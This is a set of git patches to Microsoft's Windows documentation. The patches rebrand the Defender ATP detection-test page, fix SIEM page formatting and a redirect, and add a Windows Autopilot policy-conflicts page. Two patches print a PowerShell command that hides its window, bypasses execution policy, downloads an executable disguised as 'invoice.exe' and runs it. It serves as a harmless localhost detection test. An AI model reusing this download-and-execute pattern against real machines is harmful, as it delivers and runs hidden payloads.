From e7e1753ecdb72351498ce6fe12c057b084402f31 Mon Sep 17 00:00:00 2001 From: Steve Burkett Date: Fri, 22 May 2020 12:10:14 +1200 Subject: [PATCH 1/6] Update run-detection-test.md Update folder and script to use the MDATP branding. --- .../microsoft-defender-atp/run-detection-test.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/windows/security/threat-protection/microsoft-defender-atp/run-detection-test.md b/windows/security/threat-protection/microsoft-defender-atp/run-detection-test.md index 2251ec4e49..624f4aaf34 100644 --- a/windows/security/threat-protection/microsoft-defender-atp/run-detection-test.md +++ b/windows/security/threat-protection/microsoft-defender-atp/run-detection-test.md @@ -30,7 +30,7 @@ ms.topic: article Run the following PowerShell script on a newly onboarded machine to verify that it is properly reporting to the Microsoft Defender ATP service. -1. Create a folder: 'C:\test-WDATP-test'. +1. Create a folder: 'C:\test-MDATP-test'. 2. Open an elevated command-line prompt on the machine and run the script: a. Go to **Start** and type **cmd**. @@ -42,7 +42,7 @@ Run the following PowerShell script on a newly onboarded machine to verify that 3. At the prompt, copy and run the following command: ``` - powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-WDATP-test\\invoice.exe');Start-Process 'C:\\test-WDATP-test\\invoice.exe' + powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe' ``` The Command Prompt window will close automatically. If successful, the detection test will be marked as completed and a new alert will appear in the portal for the onboarded machine in approximately 10 minutes. From 8d084ea88888e2187590b5226ca37a5623fe8cf8 Mon Sep 17 00:00:00 2001 From: Gary Moore Date: Fri, 22 May 2020 14:52:18 -0700 Subject: [PATCH 2/6] Corrected list, indentation, and code block --- .../microsoft-defender-atp/run-detection-test.md | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/windows/security/threat-protection/microsoft-defender-atp/run-detection-test.md b/windows/security/threat-protection/microsoft-defender-atp/run-detection-test.md index 624f4aaf34..b3955f8794 100644 --- a/windows/security/threat-protection/microsoft-defender-atp/run-detection-test.md +++ b/windows/security/threat-protection/microsoft-defender-atp/run-detection-test.md @@ -33,17 +33,17 @@ Run the following PowerShell script on a newly onboarded machine to verify that 1. Create a folder: 'C:\test-MDATP-test'. 2. Open an elevated command-line prompt on the machine and run the script: - a. Go to **Start** and type **cmd**. + 1. Go to **Start** and type **cmd**. - b. Right-click **Command Prompt** and select **Run as administrator**. + 1. Right-click **Command Prompt** and select **Run as administrator**. - ![Window Start menu pointing to Run as administrator](images/run-as-admin.png) + ![Window Start menu pointing to Run as administrator](images/run-as-admin.png) 3. At the prompt, copy and run the following command: - ``` - powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe' - ``` + ```powershell + powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe' + ``` The Command Prompt window will close automatically. If successful, the detection test will be marked as completed and a new alert will appear in the portal for the onboarded machine in approximately 10 minutes. From 28a81362bffc836452b8ef5d355d78cd7a038fbd Mon Sep 17 00:00:00 2001 From: Joey Caparas Date: Fri, 22 May 2020 15:05:55 -0700 Subject: [PATCH 3/6] remove from toc fix redirect --- .openpublishing.redirection.json | 2 +- windows/security/threat-protection/TOC.md | 1 - 2 files changed, 1 insertion(+), 2 deletions(-) diff --git a/.openpublishing.redirection.json b/.openpublishing.redirection.json index 863e6b22b7..bf51ddcd42 100644 --- a/.openpublishing.redirection.json +++ b/.openpublishing.redirection.json @@ -1353,7 +1353,7 @@ }, { "source_path": "windows/security/threat-protection/microsoft-defender-atp/configure-splunk.md", -"redirect_url": "https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/enable-siem-integration", +"redirect_url": "https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/configure-siem", "redirect_document_id": false }, { diff --git a/windows/security/threat-protection/TOC.md b/windows/security/threat-protection/TOC.md index 75641809bf..50032d076f 100644 --- a/windows/security/threat-protection/TOC.md +++ b/windows/security/threat-protection/TOC.md @@ -573,7 +573,6 @@ ##### [Understand threat intelligence concepts](microsoft-defender-atp/threat-indicator-concepts.md) ##### [Learn about different ways to pull detections](microsoft-defender-atp/configure-siem.md) ##### [Enable SIEM integration](microsoft-defender-atp/enable-siem-integration.md) -##### [Configure Splunk to pull detections](microsoft-defender-atp/configure-splunk.md) ##### [Configure Micro Focus ArcSight to pull detections](microsoft-defender-atp/configure-arcsight.md) ##### [Microsoft Defender ATP detection fields](microsoft-defender-atp/api-portal-mapping.md) ##### [Pull detections using SIEM REST API](microsoft-defender-atp/pull-alerts-using-rest-api.md) From 73ff781a3c6e503aeddc7ace4453ffc1306430a2 Mon Sep 17 00:00:00 2001 From: Joey Caparas Date: Fri, 22 May 2020 15:09:46 -0700 Subject: [PATCH 4/6] fix bullet --- .../microsoft-defender-atp/configure-siem.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/windows/security/threat-protection/microsoft-defender-atp/configure-siem.md b/windows/security/threat-protection/microsoft-defender-atp/configure-siem.md index 0d95a0d4e0..d5f2d69d6c 100644 --- a/windows/security/threat-protection/microsoft-defender-atp/configure-siem.md +++ b/windows/security/threat-protection/microsoft-defender-atp/configure-siem.md @@ -27,10 +27,10 @@ ms.topic: article ## Pull detections using security information and events management (SIEM) tools ->[!Note] +>[!NOTE] >- [Microsoft Defender ATP Alert](alerts.md) is composed from one or more detections. >- [Microsoft Defender ATP Detection](api-portal-mapping.md) is composed from the suspicious event occurred on the Machine and its related Alert details. ->-The Microsoft Defender ATP Alert API is the latest API for alert consumption and contain a detailed list of related evidence for each alert. For more information, see [Alert methods and properties](alerts.md) and [List alerts](get-alerts.md). +>- The Microsoft Defender ATP Alert API is the latest API for alert consumption and contain a detailed list of related evidence for each alert. For more information, see [Alert methods and properties](alerts.md) and [List alerts](get-alerts.md). Microsoft Defender ATP supports security information and event management (SIEM) tools to pull detections. Microsoft Defender ATP exposes alerts through an HTTPS endpoint hosted in Azure. The endpoint can be configured to pull detections from your enterprise tenant in Azure Active Directory (AAD) using the OAuth 2.0 authentication protocol for an AAD application that represents the specific SIEM connector installed in your environment. From 353311f2533870af725d0e7f6617c9b8ea631387 Mon Sep 17 00:00:00 2001 From: Greg Lindsay Date: Fri, 22 May 2020 17:59:10 -0700 Subject: [PATCH 5/6] new topic --- windows/deployment/windows-autopilot/TOC.md | 1 + .../windows-autopilot/policy-conflicts.md | 37 +++++++++++++++++++ 2 files changed, 38 insertions(+) create mode 100644 windows/deployment/windows-autopilot/policy-conflicts.md diff --git a/windows/deployment/windows-autopilot/TOC.md b/windows/deployment/windows-autopilot/TOC.md index d94b04fdcb..9b7c22ee03 100644 --- a/windows/deployment/windows-autopilot/TOC.md +++ b/windows/deployment/windows-autopilot/TOC.md @@ -22,6 +22,7 @@ ## [DFCI management](dfci-management.md) ## [Windows Autopilot update](autopilot-update.md) ## [Troubleshooting](troubleshooting.md) +## [Policy conflicts](policy-conflicts.md) ## [Known issues](known-issues.md) # Support diff --git a/windows/deployment/windows-autopilot/policy-conflicts.md b/windows/deployment/windows-autopilot/policy-conflicts.md new file mode 100644 index 0000000000..714387478c --- /dev/null +++ b/windows/deployment/windows-autopilot/policy-conflicts.md @@ -0,0 +1,37 @@ +--- +title: Windows Autopilot policy conflicts +ms.reviewer: +manager: laurawi +description: Inform yourself about known issues that may occur during Windows Autopilot deployment. +keywords: mdm, setup, windows, windows 10, oobe, manage, deploy, autopilot, ztd, zero-touch, partner, msfb, intune +ms.prod: w10 +ms.mktglfcycl: deploy +ms.localizationpriority: medium +ms.sitesec: library +ms.pagetype: deploy +audience: itpro +author: mtniehaus +ms.author: mtniehaus +ms.collection: M365-modern-desktop +ms.topic: article +--- + + +# Windows Autopilot - Policy Conflicts + +**Applies to** + +- Windows 10 + +There are a sigificant number of policy settings available for Windows 10, both as native MDM policies and group policy (ADMX-backed) settings. Some of these can cause issues in certain Windows Autopilot scenarios as a result of how they change the behavior of Windows 10. If you encounter any of these issues, remove the policy in question to resolve the issue. + + +
PolicyMore information + +
Device restriction / Password policy +When certain DeviceLock policies, such as minimum password length and password complexity, or any similar group policy settings, including any that disable auto-logon, are applied to a device, and that device reboots during the device Enrollment Status Page (ESP), the out-of-box experience or user desktop auto-logon could fail unexpectantly. +
+ +## Related topics + +[Troubleshooting Windows Autopilot](troubleshooting.md) From 377f5ca9a3233b32d91d9a6edd8682bed737d69d Mon Sep 17 00:00:00 2001 From: Greg Lindsay Date: Fri, 22 May 2020 18:13:53 -0700 Subject: [PATCH 6/6] fix warnings --- windows/deployment/windows-autopilot/policy-conflicts.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/windows/deployment/windows-autopilot/policy-conflicts.md b/windows/deployment/windows-autopilot/policy-conflicts.md index 714387478c..3fd528f206 100644 --- a/windows/deployment/windows-autopilot/policy-conflicts.md +++ b/windows/deployment/windows-autopilot/policy-conflicts.md @@ -11,7 +11,7 @@ ms.sitesec: library ms.pagetype: deploy audience: itpro author: mtniehaus -ms.author: mtniehaus +ms.author: mniehaus ms.collection: M365-modern-desktop ms.topic: article --- @@ -28,7 +28,7 @@ There are a sigificant number of policy settings available for Windows 10, both
PolicyMore information -
Device restriction / Password policy +
Device restriction / Password policy When certain DeviceLock policies, such as minimum password length and password complexity, or any similar group policy settings, including any that disable auto-logon, are applied to a device, and that device reboots during the device Enrollment Status Page (ESP), the out-of-box experience or user desktop auto-logon could fail unexpectantly.